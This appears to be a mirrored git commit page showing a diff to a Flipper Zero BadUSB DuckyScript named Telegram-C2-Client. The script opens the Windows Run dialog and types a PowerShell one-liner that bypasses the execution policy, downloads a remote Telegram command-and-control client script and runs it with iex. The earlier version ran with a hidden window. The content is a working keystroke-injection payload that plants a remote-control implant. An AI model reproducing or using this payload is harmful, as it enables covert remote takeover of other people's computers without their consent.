mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-03 00:10:06 -08:00
Update Telegram-C2-Client.txt
This commit is contained in:
@@ -18,11 +18,11 @@ REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Toke
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove "-W H" to show the window)
|
||||
REM open powershell
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Command-and-Control/Telegram-C2-Client.ps1 | iex
|
||||
STRING powershell -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex
|
||||
ENTER
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user